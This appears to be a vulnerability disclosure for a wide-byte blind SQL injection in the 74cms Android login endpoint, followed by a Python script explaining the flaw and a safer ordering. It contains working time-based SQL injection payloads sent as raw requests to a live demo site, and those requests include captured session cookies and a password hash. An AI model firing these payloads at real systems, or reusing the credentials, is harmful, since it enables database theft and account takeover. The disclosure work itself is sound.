### Summary:

骑士CMS (74cms): wide-byte blind SQL injection in one interface (tested against the official demo site)

### Details:

One interface used by the mobile client is vulnerable to wide-byte SQL injection. There is no keyword filtering, so in principle any data in the database can be read.

```
http://demo.74cms.com/android/login.php
```

Corresponding code:

```
$username=addslashes($username);
$password=addslashes($password);
$username=iconv("utf-8",QISHI_DBCHARSET,$username);
$password=iconv("utf-8",QISHI_DBCHARSET,$password);
```

`$username` goes straight into the SQL query after the `iconv` conversion, which leads to SQL injection: `addslashes` runs on the UTF-8 bytes, but the bytes that reach the database are the converted ones, and those can contain a trailing backslash byte that defeats the escaping. There is no output to read back, so time-based blind injection is the only option.

0x01: `"username": "%E9%8C%A6"` returns a database error

```
POST http://demo.74cms.com/android/login.php HTTP/1.1
Host: demo.74cms.com
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: null
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 73
Cookie: safedog-flow-item=7308413BC1624F4F2DF983295AAE94E8; PHPSESSID=735536f52f85396245830255c85834c4
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

req={"androidkey":"123456","username": "%E9%8C%A6", "userpwd": "111111"}
```

![1.png](https://images.seebug.org/upload/201504/24102145b6c629ce4c697ab392f361010fcf2755.png)

0x02: `"username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(1)))jmpX)#"`: time delay

```
POST http://demo.74cms.com/android/login.php HTTP/1.1
Host: demo.74cms.com
Proxy-Connection: keep-alive
Content-Length: 132
Origin: chrome-extension://hgmloofddffdnphfgcellkdfbfbjeloo
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4
Cookie: safedog-flow-item=93D3A8628D75EC8B8C5ABA78A3011359; PHPSESSID=150adfcc32e61bbb17e5d0a5ac9ace18; QS[uid]=742; QS[username]=mytstcompany; QS[password]=22a945a2f53f35b24ed4a11b398dbcf9; QS[utype]=1; QS[pmscount]=1; bdshare_firstime=1429582026109

req={"androidkey":"123456","username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(1)))jmpX)#", "userpwd": "111111"}
```

![2.png](https://images.seebug.org/upload/201504/2410220313c204e4f1f5cde43faf762072266215.png)

0x03: `"username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(5)))jmpX)#"`: time delay

```
POST http://demo.74cms.com/android/login.php HTTP/1.1
Host: demo.74cms.com
Proxy-Connection: keep-alive
Content-Length: 132
Origin: chrome-extension://hgmloofddffdnphfgcellkdfbfbjeloo
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4
Cookie: safedog-flow-item=93D3A8628D75EC8B8C5ABA78A3011359; PHPSESSID=150adfcc32e61bbb17e5d0a5ac9ace18; QS[uid]=742; QS[username]=mytstcompany; QS[password]=22a945a2f53f35b24ed4a11b398dbcf9; QS[utype]=1; QS[pmscount]=1; bdshare_firstime=1429582026109

req={"androidkey":"123456","username": "%E9%8C%A6' A<A>ND (S<A>ELECT * F<A>ROM (SE<A>LECT(SL<A>EEP(5)))jmpX)#", "userpwd": "111111"}
```

![3.png](https://images.seebug.org/upload/201504/24102213b99eb8904747c359cfd040c7e4314226.png)

A script to pull the administrator password:

```
python dbdump.py
```

![4.png](https://images.seebug.org/upload/201504/24132522aa36efcb198001eae039acf7be0a2355.png)

### Proof of vulnerability:

![1.png](https://images.seebug.org/upload/201504/24102145b6c629ce4c697ab392f361010fcf2755.png)

![2.png](https://images.seebug.org/upload/201504/2410220313c204e4f1f5cde43faf762072266215.png)

![3.png](https://images.seebug.org/upload/201504/24102213b99eb8904747c359cfd040c7e4314226.png)

![4.png](https://images.seebug.org/upload/201504/24132522aa36efcb198001eae039acf7be0a2355.png)
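As an added illustration (not code from this report or from 74cms), the following Python models the `addslashes()`-then-`iconv()` ordering at the byte level and contrasts it with escaping after transcoding. It assumes `QISHI_DBCHARSET` is gbk and that the SQL string literal is scanned byte by byte, which is consistent with the database error in 0x01 and the delays in 0x02/0x03.

```python
# Added example (not from the 74cms report or code base): a byte-level model of
# why escaping before transcoding lets a quote survive. Assumes QISHI_DBCHARSET
# is gbk and that the SQL literal is lexed byte by byte.

def addslashes(data: bytes) -> bytes:
    """Byte-oriented port of PHP addslashes(): backslash before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def vulnerable_pipeline(username: str) -> bytes:
    """Order used by the affected handler: addslashes() on the UTF-8 bytes, then
    iconv("utf-8", "gbk", ...). The escape sees no 0x5C in the UTF-8 form, but
    the GBK form of some characters (錦 -> E5 5C) ends in a backslash byte, so
    the backslash addslashes() put before a quote turns into an escaped
    backslash and the quote itself goes live."""
    escaped_utf8 = addslashes(username.encode("utf-8"))
    return escaped_utf8.decode("utf-8").encode("gbk")


def hardened_pipeline(username: str) -> bytes:
    """Transcode first, then escape the bytes the server actually receives.
    Prepared statements, or mysqli_real_escape_string() on a connection whose
    charset is set to gbk, are the proper fix; this only shows why order matters."""
    return addslashes(username.encode("gbk"))


def classify_literal(payload: bytes) -> str:
    """Scan '<payload>' the way a byte-oriented SQL lexer would and report whether
    the literal closes exactly where the query template expects it to."""
    sql = b"'" + payload + b"'"
    i = 1
    while i < len(sql):
        if sql[i] == 0x5C:          # backslash escapes the next byte
            i += 2
            continue
        if sql[i] == 0x27:          # unescaped quote terminates the literal
            return "ok" if i == len(sql) - 1 else "breakout"
        i += 1
    return "unterminated"           # closing quote was consumed: syntax error


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_pipeline), ("hardened", hardened_pipeline)):
        for probe in ("錦", "錦'", "a'b"):   # constructed inputs; 錦 is %E9%8C%A6
            out = fn(probe)
            print(f"{name:10s} {probe!r:8s} -> {out.hex(' '):18s} {classify_literal(out)}")
```

Running it shows the vulnerable order leaving `錦` alone as an unterminated literal (the 0x01 error) and `錦'` as a breakout, while the hardened order keeps every probe inside the literal.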